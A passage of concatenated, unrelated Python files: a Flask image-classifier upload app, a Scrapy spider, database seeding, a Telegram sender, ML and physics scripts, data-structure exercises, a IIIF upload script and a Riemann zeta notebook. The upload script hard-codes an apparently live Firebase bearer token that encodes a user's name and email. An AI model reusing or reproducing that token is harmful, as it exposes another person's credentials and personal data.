    return extension in ALLOWED_EXTENSIONS
@app.route('/')
def home():
    """Render the upload form."""
    return render_template('index.html')
@app.route('/', methods=['POST'])
def upload_image():
    """Handle an upload: save the image, classify it, store the patient
    record plus the prediction in PostgreSQL, and re-render the page.
    """
    cursor = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
    if 'file' not in request.files:
        flash('No file part')
        return redirect(request.url)
    file = request.files['file']
    if file.filename == '':
        flash('No image selected for uploading')
        return redirect(request.url)
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        #print('upload_image filename: ' + filename)
        # The FileStorage object is passed directly; PIL reads it as a
        # file-like object.
        probabilities, predicted_class_index, predicted_class_name = predict_image_class(file)
        #print('Probabilities:', probabilities)
        #print('Predicted class index:', predicted_class_index)
        #print('Predicted class name:', predicted_class_name)
        #probabilities.values.astype(int)
        #predicted_class = predicted_class_name.tolist()
        # NOTE(review): the mean of a 3-way softmax is always 1/3;
        # presumably the intent was the maximum probability -- confirm.
        prob = float(np.mean(probabilities))
        name=request.form["name"]
        age=request.form["age"]
        city=request.form["city"]
        state=request.form["state"]
        pincode=request.form["pincode"]
        mobile=request.form["mobile"]
        gender=request.form["gender"]
        bloodgroup=request.form["bloodgroup"]
        # Parameterized insert: user input never concatenated into SQL.
        cursor.execute("INSERT INTO db_cc_photo (img , name , age, city, state, pincode, mobile, gender, bloodgroup ,predicted_class_name, probabilities) VALUES (%s ,%s ,%s ,%s ,%s ,%s ,%s ,%s ,%s ,%s ,%s)", (filename, name , age, city, state, pincode, mobile, gender, bloodgroup, predicted_class_name, prob) )
        conn.commit()
        #file_path = file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        # Make prediction
        #display(image_path)
        # NOTE(review): the first format() call passes two args for one
        # placeholder; the extra argument is silently ignored.
        return render_template('index.html', prediction_text='Covid-19 Detection Result is : {}'.format(predicted_class_name , prob), prob_text='And Probability is : {}'.format( prob) , filename=filename)
        #flash('Image successfully uploaded and displayed below')
        #return render_template('index.html', filename=filename)
    else:
        flash('Allowed image types are - png, jpg, jpeg, gif')
        return redirect(request.url)
@app.route('/display/<filename>')
def display_image(filename):
    """Permanently redirect to the static URL of an uploaded image."""
    print('display_image filename: ' + filename)
    return redirect(url_for('static', filename='uploads/' + filename), code=301)
if __name__ == "__main__":
    # Development server only; debug mode must be off in production.
    app.debug = True
    app.run()
|
import scrapy
from registrarData.items import RegistrardataItem
class ComSciSpider(scrapy.Spider):
    """Scrapes UCLA registrar pages for Fall 2014 Computer Science classes.

    Pipeline: the course-list page -> per-course detselect page ->
    per-section subdet page, accumulating one RegistrardataItem per course.
    """
    name = "ComSciClasses"
    allowed_domains = ["registrar.ucla.edu"]
    start_urls = [
        "http://www.registrar.ucla.edu/schedule/crsredir.aspx?termsel=14F&subareasel=COM+SCI"
    ]
    def parse(self, response):
        """Yield one detail-page request per course <option> entry."""
        filename = response.url.split("/")[-2]
        # NOTE(review): this file is opened for writing but nothing is ever
        # written to it -- presumably a leftover from a save-to-disk draft.
        with open(filename, 'wb') as f:
            for sel in response.xpath('//option'):
                # NOTE: `id` shadows the builtin; value is the course code.
                id = sel.xpath('@value').extract()[0]
                id = id.replace(' ', '+')  # URL-encode spaces as '+'
                next_url = "http://www.registrar.ucla.edu/schedule/detselect.aspx?termsel=14F&subareasel=COM+SCI&idxcrs=" + id
                request = scrapy.Request(url=next_url,
                                         callback=self.parse_detselect)
                item = RegistrardataItem()
                # Thread the item through the request chain via meta.
                request.meta['item'] = item
                yield request
    def parse_detselect(self, response):
        """
        Parses page with lecture/discussion section info and follows the
        first section's ID link to the subdet page.
        """
        next_url = response.xpath('//span[@id=\'{}\']/span/a/@href'.format(
            'ctl00_BodyContentPlaceHolder_detselect_ctl02_ctl02_lblIDNumber'
        )).extract()[0]
        next_url = 'http://www.registrar.ucla.edu/schedule/' + next_url
        request = scrapy.Request(url=next_url,
                                 callback=self.parse_subdet)
        request.meta['item'] = response.meta['item']
        yield request
    def parse_subdet(self, response):
        """
        Parses page with section/course info and fills the item's fields
        from the ASP.NET label spans.
        """
        item = response.meta['item']
        # Common prefix of every label span id on the page.
        label = 'ctl00_BodyContentPlaceHolder_subdet_lbl'
        span_text = 'span[@id=\'{}\']/text()'
        main_div = response.xpath('//div[@id=\'{}\']'.format(
            'ctl00_BodyContentPlaceHolder_subdet_pnlBodyContent'
        ))
        item['course_name'] = main_div.xpath('p/' + span_text.format(
            label + 'CourseHeader'
        )).extract()[0]
        # Lecture/section details.
        section_info = main_div.xpath('div[@id=\'{}\']/p'.format(
            'ctl00_BodyContentPlaceHolder_subdet_pnlSectionInfo'
        ))
        item['lec_num'] = section_info.xpath(span_text.format(
            label + 'Section'
        )).extract()[0]
        item['lec_prof'] = section_info.xpath(span_text.format(
            label + 'Instructor'
        )).extract()[0]
        item['lec_final'] = section_info.xpath(span_text.format(
            label + 'FinalExam'
        )).extract()[0]
        # Course-level details.
        course_info = main_div.xpath('div[@class=\'{}\']/p'.format(
            'tblCourseBody_detselect'
        ))
        item['course_desc'] = course_info.xpath(span_text.format(
            label + 'CourseDescription'
        )).extract()[0]
        item['course_ge'] = course_info.xpath(span_text.format(
            label + 'GEStatus'
        )).extract()[0]
        item['course_units'] = course_info.xpath(span_text.format(
            label + 'Units'
        )).extract()[0]
        item['course_grading'] = course_info.xpath(span_text.format(
            label + 'GradingDetail'
        )).extract()[0]
        item['course_reqs'] = course_info.xpath(span_text.format(
            label + 'EnforcedReq'
        )).extract()[0]
        item['course_impacted'] = course_info.xpath(span_text.format(
            label + 'Impacted'
        )).extract()[0]
        item['course_restrict']= course_info.xpath(span_text.format(
            label + 'EnrollRestrict'
        )).extract()[0]
        item['course_consent']= course_info.xpath(span_text.format(
            label + 'ConsentReq'
        )).extract()[0]
        item['course_fee'] = course_info.xpath(span_text.format(
            label + 'MaterialFee'
        )).extract()[0]
        item['course_notes'] = course_info.xpath(span_text.format(
            label + 'Notes'
        )).extract()[0]
        return item
|
#!/usr/bin/env python2
# Imports for connecting to SQLite DB
from sqlalchemy import create_engine, exc
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Category, Item, User
# Connect to DB
DBNAME = "sqlite:///itemcatalogwithusers.db"
engine = create_engine(DBNAME)
Base.metadata.bind = engine
# Create DB session instance
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Create list of categories (inserted in this order, so ids start at 1).
CATEGORIES = [
    "Soccer",
    "Basketball",
    "Baseball",
    "Frisbee",
    "Snowboarding",
    "Rock Climbing",
    "Foosball",
    "Skating",
    "Hockey"
]
# List of items -- category_id refers to the CATEGORIES order above;
# every item is owned by user 1.
ITEMS = [
    Item(
        category_id=1,
        title="Soccer Cleats",
        description="The shoes",
        user_id=1),
    Item(category_id=1, title="Jersey", description="The shirt", user_id=1),
    Item(category_id=2, title="Jersey", description="The shirt", user_id=1),
    Item(category_id=3, title="Bat", description="The bat", user_id=1),
    Item(category_id=5, title="Snowboard", description="The board", user_id=1)
]
# List of users
USERS = [
    User(name="John Doe", email="johndoe@example.com")
]
# Add Categories to DB
def add_categories(categories):
    """Insert each category title, rolling back duplicates."""
    for title in categories:
        try:
            session.add(Category(title=title))
            session.commit()
        except exc.IntegrityError:
            # Already present; undo the failed insert and continue.
            session.rollback()
# Add Items to DB
def add_items(items):
    """Insert each prepared Item, rolling back rows that violate constraints."""
    for record in items:
        try:
            session.add(record)
            session.commit()
        except exc.IntegrityError:
            # Constraint violation; undo the failed insert and continue.
            session.rollback()
# Add Users to DB
def add_users(users):
    """Insert each prepared User, rolling back rows that violate constraints."""
    for account in users:
        try:
            session.add(account)
            session.commit()
        except exc.IntegrityError:
            # Constraint violation; undo the failed insert and continue.
            session.rollback()
# Seed the database.  NOTE(review): items hard-code user_id=1 but users are
# inserted last -- fine only when foreign keys are not enforced; confirm.
add_categories(CATEGORIES)
add_items(ITEMS)
add_users(USERS)
|
import telegram
import os
def send_telegram(message=None,image=None):
    """Send a text message and/or a photo to the configured Telegram channel.

    Credentials are taken from the TELEGRAM_CHANNEL_ID and TELEGRAM_TOKEN
    environment variables.  When both arguments are given the message is
    sent first; with neither, a notice is printed and nothing is sent.
    """
    chat_id = os.getenv('TELEGRAM_CHANNEL_ID')
    bot = telegram.Bot(token=os.getenv('TELEGRAM_TOKEN'))
    if not message and not image:
        print('No data found.')
        return
    if message:
        bot.send_message(chat_id=chat_id, text=message)
    if image:
        with open(image, 'rb') as img:
            bot.send_photo(chat_id=chat_id, photo=img)
if __name__ == "__main__":
    # Smoke test: with neither message nor image this only prints 'No data found.'
    send_telegram(None,None)
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 31 18:56:59 2019
@author: Raghav
"""
import numpy as np
import cv2
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score
from sklearn.externals import joblib
import os
# Each sub-directory of output/ is one character class; its name is the label.
dirs = os.listdir('output/')
DIRECTORY = './output/'
def trainingDataFormation():
    """Load every character image from the output/<label>/ directories.

    Returns (image_data, target_value): flattened binarised images and the
    directory name (the character label) for each sample.
    """
    image_data = []
    target_value = []
    for dname in dirs:
        currentDirectory = DIRECTORY + str(dname) + '/'
        files = os.listdir(currentDirectory)
        for cfile in files:
            # Read as greyscale, then binarise at threshold 90.
            image = cv2.imread(currentDirectory+cfile, 0)
            ret, letter_inverse_threshold = cv2.threshold(image, 90, 255, cv2.THRESH_BINARY)
            # Flatten to a 1-D feature vector.
            flat_letter_inverse_threshold = np.reshape(letter_inverse_threshold, -1)
            image_data.append(flat_letter_inverse_threshold)
            target_value.append(dname)
    return (np.array(image_data), np.array(target_value))
# Build the training matrix, scale pixels to [0, 1], and fit an RBF SVM.
image_data, target_value = trainingDataFormation()
image_data = np.divide(image_data, 255)
svc_classifier = SVC(kernel = 'rbf', random_state=0)
svc_classifier.fit(image_data, target_value)
def crossValidation(model, folds, training_data, training_label):
    """Return the per-fold accuracy scores of k-fold cross-validation."""
    return cross_val_score(model, training_data, training_label, cv=int(folds))
# 5-fold cross-validation accuracy, then persist the fitted model.
accuracy = crossValidation(svc_classifier, 5, image_data, target_value)
saveDir = '../Models/SVC/'
# NOTE(review): sklearn.externals.joblib is removed in modern scikit-learn;
# the standalone joblib package is the drop-in replacement.
joblib.dump(svc_classifier, saveDir + 'svc2.pkl')
|
__author__ = 'iceke'
|
# Package version, kept in sync in both string and tuple form.
__version__ = "3.3.1-beta4"
__version_info__ = (3, 3, 1, 'beta4')
|
import matplotlib.pyplot as plt
import numpy as np
import uncertainties.unumpy as unp
import scipy.constants as con
from scipy.optimize import curve_fit
from scipy import stats
from uncertainties import ufloat
################################################################################
print('\n' + '(I) Bestimmung der Wellenlänge')
N, d = np.genfromtxt('data/1.txt', unpack=True)
ü = 5.017 # lever transmission ratio of the micrometer drive
# NOTE(review): assumes d is read in metres; confirm the data-file unit.
d = d * 10**6 # -> µm
# d = np.mean(d)
# print(d)
# N = np.mean(N)
# Factor 2: the mirror displacement changes the optical path by 2*d.
l = (2*d)/(N * ü) # measured wavelength, in µm
print(l)
l = ufloat(np.mean(l), stats.sem(l))
# NOTE(review): l is in µm at this point but the label below says 'nm' --
# confirm the intended unit.
print('Bestimmte Wellenlaenge des Lasers: ', l, 'nm')
################################################################################
print('\n\n' + '(II) Brechungsindizes')
N2, p = np.genfromtxt('data/2.txt', unpack=True)
################################
p0 = 1.01325 # standard pressure, bar
T0 = 273.15 # standard temperature, K
T = 293.15 # lab temperature, K
b = 50*10**(-3) # gas-cell length, m
################################
lr = 635 * 10**(-9) # wavelength of the laser used, in m (635 nm)
# N2 = np.mean(N2)
# Refractive-index change from fringe count: dn = N*lambda / (2*b).
dn = (N2 * lr) / (2 * b)
# p = np.mean(p)
p = p * (-1)
print('Delta_p = ', p)
# Extrapolate to standard conditions via the ideal-gas relation.
nn = 1 + dn * (T / T0) * (p0 / p)
print(nn)
nn = ufloat(np.mean(nn), stats.sem(nn))
print('n = ', nn)
################################ DISKUSSION ####################################
print('\n\n' + '(III) Abweichungen von der Theorie')
lr = 635 # reference wavelength, nm
nluft = 1.000292 # literature refractive index of air
# http://www.didaktik.physik.uni-duisburg-essen.de/~backhaus/NaturPhysikalisch/Naturphysikalischgesehen2004/OptischePhaenomene/Regenbogen/Brechungsindizes.htm
###################
# l = l * 10**3 # nm
# NOTE(review): l is still in µm while lr is in nm (the conversion above is
# commented out), so this relative deviation looks unit-inconsistent; confirm.
dl = (l - lr) / lr
print('Delta l: ', dl)
# Compare the measured refractivity (n - 1) against the literature value.
nluft = nluft - 1
nn = nn - 1
print(nn)
dnn = (nn - nluft) / nluft
print('Delta nn: ', dnn)
|
#
# (C) Copyright 2012 Enthought, Inc., Austin, TX
# All right reserved.
#
# This file is open source software distributed according to the terms in
# LICENSE.txt
#
from .transition_manager import TransitionManager
# Module-level singleton, created lazily by get_transition_manager().
_transition_manager = None
def get_transition_manager():
    """ Get the global transition manager, creating it on first use. """
    global _transition_manager
    if _transition_manager is None:
        _transition_manager = TransitionManager()
    return _transition_manager
def set_transition_manager(transition_manager):
    """ Set the global transition manager.

    Parameters
    ----------
    transition_manager - The instance to install as the process-wide singleton.

    Raises
    ------
    ValueError - If a transition manager has already been set. This is to prevent
    the loss of registered listeners which may be being used by others.

    """
    global _transition_manager
    if _transition_manager is not None:
        # The original message said 'Event manager' (copy-paste from the
        # event-manager module); report the correct component.
        raise ValueError('Transition manager has already been set.')
    _transition_manager = transition_manager
|
#!/usr/bin/python3
"""Single linked list Module"""
class Node:
    """One element of a singly linked list.

    Holds an integer payload (``data``) and a reference to the following
    node (``next_node``), which is None at the tail of the list.
    """

    def __init__(self, data, next_node=None):
        """Validate and store the payload and the successor reference."""
        self.data = data
        self.next_node = next_node

    @property
    def data(self):
        """The integer stored in this node."""
        return self.__data

    @data.setter
    def data(self, value):
        # Exact type check on purpose: bool (a subclass of int) is rejected,
        # matching the strict contract of this exercise.
        if type(value) is not int:
            raise TypeError("data must be an integer")
        self.__data = value

    @property
    def next_node(self):
        """The following Node, or None if this is the last one."""
        return self.__next_node

    @next_node.setter
    def next_node(self, value):
        if value is not None and not isinstance(value, Node):
            raise TypeError("next_node must be a Node object")
        self.__next_node = value
class SinglyLinkedList:
    """Singly linked list of integers kept in increasing order.

    The private ``head`` attribute points at the first Node (or None when
    the list is empty); ``sorted_insert`` keeps the ordering invariant.
    """

    def __init__(self):
        """Start with an empty list."""
        self.head = None

    def sorted_insert(self, value):
        """Insert a new Node at its sorted (increasing) position."""
        node = Node(value)
        prev = None
        walker = self.head
        # Advance past every node whose payload is strictly smaller.
        while walker is not None and walker.data < value:
            prev = walker
            walker = walker.next_node
        node.next_node = walker
        if prev is None:
            self.head = node  # empty list or new smallest element
        else:
            prev.next_node = node

    def __str__(self):
        """Render the list as one value per line, head first."""
        parts = []
        walker = self.head
        while walker is not None:
            parts.append(str(walker.data))
            walker = walker.next_node
        return "\n".join(parts)
|
#User function Template for python3
def checkOddEven(x):
    """Return True if x is even, False if x is odd."""
    # One modulo comparison covers both branches of the original if/elif:
    # the remainder is 0 exactly for even numbers.
    return x % 2 == 0
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Schema migration: adds team-point counters (points scored while the
    # player's team was on offense / on defense) to each statline variant.
    # default=0 backfills existing rows when the columns are created.
    dependencies = [
        ('basketball', '0053_auto_20160606_1919'),
    ]
    operations = [
        migrations.AddField(
            model_name='dailystatline',
            name='def_team_pts',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='dailystatline',
            name='off_team_pts',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='recordstatline',
            name='def_team_pts',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='recordstatline',
            name='off_team_pts',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='seasonstatline',
            name='def_team_pts',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='seasonstatline',
            name='off_team_pts',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='statline',
            name='def_team_pts',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='statline',
            name='off_team_pts',
            field=models.PositiveIntegerField(default=0),
        ),
    ]
|
# Sample values covering the basic built-in types.
num = 1
flt = 20.21
word = 'Thor'
sentence = '''
Star Wars
are better
than Avengers
'''
bln = True

# Dump each sample variable together with its runtime type.
for value in (num, flt, word, sentence, bln):
    print(f'Variable: {value}', '-', type(value))
|
'''
四键键盘问题-打印最多次A
'''
# 原始版
def max_a(N):
    """Max number of 'A's printable with N keystrokes.

    Keys: 'A', Ctrl-A + Ctrl-C (counted as two presses) and Ctrl-V.
    Plain recursion over (remaining presses, screen count, clipboard),
    exponential time -- fine only for small N.
    """
    def search(remaining, on_screen, clipboard):
        if remaining <= 0:
            return on_screen
        return max(
            search(remaining - 1, on_screen + 1, clipboard),          # press A
            search(remaining - 1, on_screen + clipboard, clipboard),  # paste
            search(remaining - 2, on_screen, on_screen),              # select-all + copy
        )
    return search(N, 0, 0)
# 消除重叠子
def max_a(N):
    """Max number of 'A's printable with N keystrokes, memoized.

    Same recursion as the naive version, but results are cached per
    (remaining, on_screen, clipboard) state to avoid recomputation.
    """
    cache = {}

    def search(remaining, on_screen, clipboard):
        if remaining <= 0:
            return on_screen
        key = (remaining, on_screen, clipboard)
        if key not in cache:
            cache[key] = max(
                search(remaining - 1, on_screen + 1, clipboard),          # press A
                search(remaining - 1, on_screen + clipboard, clipboard),  # paste
                search(remaining - 2, on_screen, on_screen),              # select-all + copy
            )
        return cache[key]

    return search(N, 0, 0)
# 高配版
def max_a(N):
    """Max number of 'A's printable with N keystrokes, bottom-up DP.

    dp[i] is the best count achievable with i keystrokes: either press 'A'
    once more (dp[i-1] + 1), or pick a step j where select-all + copy took
    presses j-1 and j, then paste i-j times, multiplying dp[j-2] by
    (i - j + 1).  O(N^2) time, O(N) space.
    """
    # [0] * (N+1) instead of [None]: dp[0] = 0 is a real base case and no
    # slot is ever read before being written.
    dp = [0] * (N + 1)
    for i in range(1, N + 1):
        dp[i] = dp[i - 1] + 1  # press A
        for j in range(2, i):
            # select-all + copy at presses j-1/j, then paste i-j times:
            # the screen ends with dp[j-2] * (i - j + 1) copies.
            dp[i] = max(dp[i], dp[j - 2] * (i - j + 1))
    # Debug print of the whole dp table removed -- it was leftover output.
    return dp[N]
# 上面 `高配版` 的 dp 记录的是 整个N(0-N)的最高次数,空间复杂度为O(N),而实际中我们只需要数组的最后一个,所以可以继续优化
# Demo: run the last max_a defined above (the DP version) for N = 9 presses.
r = max_a(9)
print(r)
|
from .sgc import SGC
from .ssgc import SSGC
from .gcn import GCN
from .base_sat import BaseSAT
|
from flask import Flask
from flask_wtf.csrf import CSRFProtect
from . import auth, csrf_token, clients
def init_app(app: Flask):
    """Attach the auth, csrf_token and clients blueprints to *app* and
    enable CSRF protection.

    The csrf_token blueprint is exempted from CSRF checks because it is
    the endpoint that hands out the CSRF token in the first place.
    """
    protection = CSRFProtect(app)
    for blueprint in (auth.bp, csrf_token.bp, clients.bp):
        app.register_blueprint(blueprint)
    protection.exempt(csrf_token.bp)
|
# NOTE(review): the two bare names below are no-op expressions -- they just
# evaluate to the module objects.  If the modules do their work at import
# time, the import statement alone already triggered it; if they expose a
# function, it is never called here.  Confirm the intended entry points.
import load_vendor_to_datalake, delete_data_datalake
#loading data from vendor source to our data mart
load_vendor_to_datalake
#deleting data from data marts that is older than X days
delete_data_datalake
|
# coding: utf-8
import requests
import time
import json
DIR_NAME = "ndl"
token = "eyJhbGciOiJSUzI1NiIsImtpZCI6ImMzZjI3NjU0MmJmZmU0NWU5OGMyMGQ2MDNlYmUyYmExMTc2ZWRhMzMiLCJ0eXAiOiJKV1QifQ.eyJuYW1lIjoidS5uYWthbXVyYS5zYXRvcnUgdSIsInBpY3R1cmUiOiJodHRwczovL2xoMy5nb29nbGV1c2VyY29udGVudC5jb20vLXBZeVhMVEpMeFE0L0FBQUFBQUFBQUFJL0FBQUFBQUFBQUFBL0FDSGkzcmVWR21aMzNBQTRXSGloWGQ0aGZfSUcyNHpIX1EvcGhvdG8uanBnIiwiaXNzIjoiaHR0cHM6Ly9zZWN1cmV0b2tlbi5nb29nbGUuY29tL2NvZGgtODEwNDEiLCJhdWQiOiJjb2RoLTgxMDQxIiwiYXV0aF90aW1lIjoxNTkyMzk3NTgyLCJ1c2VyX2lkIjoiUGwySXNUNWlVV1Z5SVZQUFFkNVNZbHZkdmV6MiIsInN1YiI6IlBsMklzVDVpVVdWeUlWUFBRZDVTWWx2ZHZlejIiLCJpYXQiOjE1OTI1MTc1MTcsImV4cCI6MTU5MjUyMTExNywiZW1haWwiOiJ1Lm5ha2FtdXJhLnNhdG9ydUBnLmVjYy51LXRva3lvLmFjLmpwIiwiZW1haWxfdmVyaWZpZWQiOnRydWUsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZ29vZ2xlLmNvbSI6WyIxMDExNzI0MzcwNTUzMjI0MjcwMDYiXSwiZW1haWwiOlsidS5uYWthbXVyYS5zYXRvcnVAZy5lY2MudS10b2t5by5hYy5qcCJdfSwic2lnbl9pbl9wcm92aWRlciI6Imdvb2dsZS5jb20ifX0.ORLwowbWPDczX92pSumFVXXgkT7NQnhf4em-0tQtdZyGoC0kFBSq_PG-fqDHxv56B_RU4Dwa_yNSN6tJcJHFnO3XMYMdyNiIlpGRM4IUzmnKirZ8fIBg1H_6j0Abw32wP3v3LF2KzVNwL0SqIa_MGCTP3hpV5JnQY_PznwRGjdL_LxbJVzD6RP_XUrBh-PFb9xoFn3R0AGilFTUrc1OZTnnWDab7KzavOmTMml-DNn9-L1El-qCJpj0bjcFu2csmZX0krugAwjoILlfDNMi4AhkpptWQfjgG6bDFGZ6xGMexbfKRb6cwCHgyLAuaRzxPrX9mnMHr_3eksy2vZHat2A"
# Walk manifests 01..54, read each local IIIF manifest, and POST two image
# regions per canvas to the kuronet endpoint for processing.
for i in range(1, 55):
    # range(1, 55) guarantees i >= 1, so the original `if i >= 1 ... else:
    # continue` guard was dead code; just log the manifest number.
    print(i)
    # Public URL of the manifest (sent along with each POST below).
    manifest = "https://raw.githubusercontent.com/nakamura196/genji_curation/master/docs/iiif/"+DIR_NAME+"/"+str(i).zfill(2)+".json"
    print(manifest)
    # Read the local checkout of the same manifest instead of fetching it.
    with open("../../docs/iiif/"+DIR_NAME+"/"+str(i).zfill(2)+".json") as f:
        df = json.load(f)
    # df = requests.get(manifest).json()
    sequence = df["sequences"][0]
    if "canvases" not in sequence:
        continue
    canvases = sequence["canvases"]
    # areas = ["3600,1000,2400,3000", "1200,1000,2400,3000"]
    # x,y,w,h regions of each page image to submit to the service.
    areas = ["3400,2000,2900,2800", "400,2000,2900,2800"]
    # areas = ["1000,900,5000,3200"]
    for canvas in canvases:
        print(i, canvas["@id"])
        prefix = canvas["images"][0]["resource"]["service"]["@id"]
        for xywh in areas:
            time.sleep(0.5)  # throttle requests to the public API
            # POST parameters are passed as a dict in the second argument.
            response = requests.post(
                'https://mp.ex.nii.ac.jp/api/kuronet/post',
                {
                    'image':prefix + '/'+xywh+'/full/0/default.jpg',
                    'manifest' : manifest,
                    'canvas' : canvas["@id"],
                    'xywh' : xywh,
                    'token' : token
                })
            # response.json() would decode the JSON body into a dict if the
            # payload were needed; only the status is logged here.
            print(response)
|
# Transfer learning: load a previously trained model, freeze its layers,
# and train a new 3-class softmax head on an image-folder dataset.
import tensorflow.keras as keras
model = keras.models.load_model('data/dogsvscats/vgg16model-small.h5')
# Freeze everything except the last layer so only the new head is trained.
for layer in model.layers[:-1]:
    layer.trainable = False
# NOTE(review): the new Dense layer is stacked on top of the loaded model's
# existing output layer rather than replacing it -- confirm that is intended.
model.add(keras.layers.Dense(3))
model.add(keras.layers.Activation('softmax'))
model.summary()
model.compile(loss='categorical_crossentropy',
              optimizer="rmsprop",
              metrics=['accuracy'])
# Augmented training images; 20% of the folder is held out for validation.
trainset = keras.preprocessing.image.ImageDataGenerator(rescale=1. / 255, validation_split=0.2,
                                                        shear_range=0.2,
                                                        zoom_range=0.2,
                                                        horizontal_flip=True)
batchSize = 16
# Training split: images resized to 224x224, one-hot (categorical) labels.
trainGenerator = trainset.flow_from_directory(
    'data/dogsvscats/small/train',
    target_size=(224, 224),
    subset='training',
    class_mode="categorical",
    batch_size=batchSize)
# Validation split drawn from the same directory via validation_split above.
validationGenerator = trainset.flow_from_directory(
    'data/dogsvscats/small/train',
    target_size=(224, 224),
    class_mode="categorical",
    subset = 'validation',
    batch_size=batchSize)
model.fit(
    trainGenerator,
    epochs=30,
    validation_data=validationGenerator,
)
# Persist the fine-tuned model.
model.save('data/dogsvscats/vgg16model-cows.h5')
|
#OOP paradigm
class Person:
    """Minimal class used to demonstrate class attributes and methods."""

    # Class attribute: shared by every instance of Person.
    species = "Homo sapien sapien"

    def walk(self):
        """Announce that this person is walking (expects self.name set)."""
        print("{} Is walking".format(self.name))

    def sleep(self):
        """Announce that this person is sleeping (expects self.name set)."""
        print("{} Is sleeping".format(self.name))
# Create two independent Person instances.
p1= Person()
p2=Person()
# Class attributes are readable through any instance.
print(p1.species)
# Instance attributes can be attached on the fly, outside any __init__.
p1.name="Stan"
p2.name="shishi"
p1.age=45
p1.job="Manager"
p1.style="Casual-smart"
p1.car="BMW"
print(p1.name)
# Methods read the per-instance attributes set above.
p1.walk()
p2.sleep()
# p2.name="Mandela"
# p2.age=34
|
#!/usr/bin/env python
# coding: utf-8
# # Riemann's Zeta-Function and Riemann's Hypothesis
#
# Powered by: Dr. Hermann Völlinger, DHBW Stuttgart(Germany); May 2021
#
# Prereq.'s: you need to extract the zip-file 'Images.zip' in a directory with name 'Images'
#
# ## Item1: Riemann's Zeta-Function
#
# See: https://en.wikipedia.org/wiki/Riemann_zeta_function
#
# For a non-expert introduction about the background and history of the Riemman's Zeta Fct & Riemann's Hypothesis (in German language, Christmas Lecture 2016 of HAW Hamburg) see the following YouTube video: https://www.youtube.com/watch?v=sZhl6PyTflw&vl=en
#
# The Riemann zeta function or Euler–Riemann zeta function, zeta(s), is a function of a complex variable s that analytically
# continues the sum of the Dirichlet serie which converges when the real part of s is greater than 1.
#
# More general representations of zeta(s) for all s are given below. The Riemann zeta function plays a pivotal role in
# analytic number theory and has applications in physics, probability theory, and applied statistics.
# As a function of a real variable, Leonhard Euler first introduced and studied it in the first half of the eighteenth century
# without using complex analysis, which was not available at the time. Bernhard Riemann's 1859 article "On the Number of
# Primes Less Than a Given Magnitude" extended the Euler definition to a complex variable, proved its meromorphic continuation
# and functional equation, and established a relation between its zeros and the distribution of prime numbers.[2]
#
# The values of the Riemann zeta function at even positive integers were computed by Euler. The first of them, zeta(2), provides a solution to the Basel problem. In 1979 Roger Apéry proved the irrationality of zeta(3). The values at negative integer points, also found by Euler, are rational numbers and play an important role in the theory of modular forms.
# Many generalizations of the Riemann zeta function, such as Dirichlet series, Dirichlet L-functions and L-functions, are known.
#
# See also the following youtube video explaining in mathematical details of the Riemann's Zeta Fct. zetas(s), s = complex number and also the Riemann's Hypothesis: https://youtu.be/sD0NjbwqlYw
# ### Item1.1: Dirichlet Series of Zeta-Function
#
# https://en.wikipedia.org/wiki/Dirichlet_series
# In mathematics, a Dirichlet series is any series of the form of the following picture (see below).
# The Dirichlet series of Riemann's Zeta-Function is a complex sequence. It is a special case of general Dirichlet series.
# Dirichlet series play a variety of important roles in analytic number theory. The most usually seen definition of the
# Riemann zeta function is a Dirichlet series, as are the Dirichlet L-functions.
# In[1]:
print("** DirichletForm of the Riemann Zeta-Fuction (Euler-Function)**")
#print("LATEX syntax zeta(s), re(s)>1:$ \zeta(s)=\sum_{n=1}^\infty 1/n^s $")
from IPython.display import Image
Image('Images/DirichletForm4Riem-ZetaFct.jpg')
# ### Item1.2: The Basel Problem
# The Basel problem is a problem in mathematical analysis with relevance to number theory, first posed by Pietro Mengoli in 1650 and solved by Leonhard Euler in 1734,[1] and read on 5 December 1735 in The Saint Petersburg Academy of Sciences.[2] Since the problem had withstood the attacks of the leading mathematicians of the day, Euler's solution brought him immediate fame when he was twenty-eight. Euler generalised the problem considerably, and his ideas were taken up years later by Bernhard Riemann in his seminal 1859 paper "On the Number of Primes Less Than a Given Magnitude", in which he defined his zeta function and proved its basic properties. The problem is named after Basel, hometown of Euler as well as of the Bernoulli family who unsuccessfully attacked the problem.
#
# The Basel problem asks for the precise summation of the reciprocals of the squares of the natural numbers, i.e. the precise sum of the infinite series:
#
# The sum of the series is approximately equal to 1.644934.[3] The Basel problem asks for the exact sum of this series (in closed form), as well as a proof that this sum is correct. Euler found the exact sum to be pi²/6 and announced this discovery in 1735. His arguments were based on manipulations that were not justified at the time, although he was later proven correct. He produced a truly rigorous proof in 1741.
# In[2]:
print("Consider the special case s = 2 + i*0, so we get the follw. series:")
print("** This is the famous 'Basel-Problem' solved by L. Euler in 1735 **")
from IPython.display import Image
Image('Images/Basel_Problem.jpg')
# ### Item1.3: Riemann's Zeta Fct for Complex Numbers
# If you extend the Dirichlet series on the whole complex plane, Riemann found a nice formula, which we call complex Riemann Zeta-Fct. (cRZ). The following picture show the formula.
# In[3]:
print("*** This is the famous Riemann Zeta(s)-Fct. for s=complex numbers ***")
from IPython.display import Image
Image('Images/complex_RiemannZeta-Formula.jpg')
# ### Item1.4: Euler Product Formula
#
# https://en.wikipedia.org/wiki/Proof_of_the_Euler_product_formula_for_the_Riemann_zeta_function
#
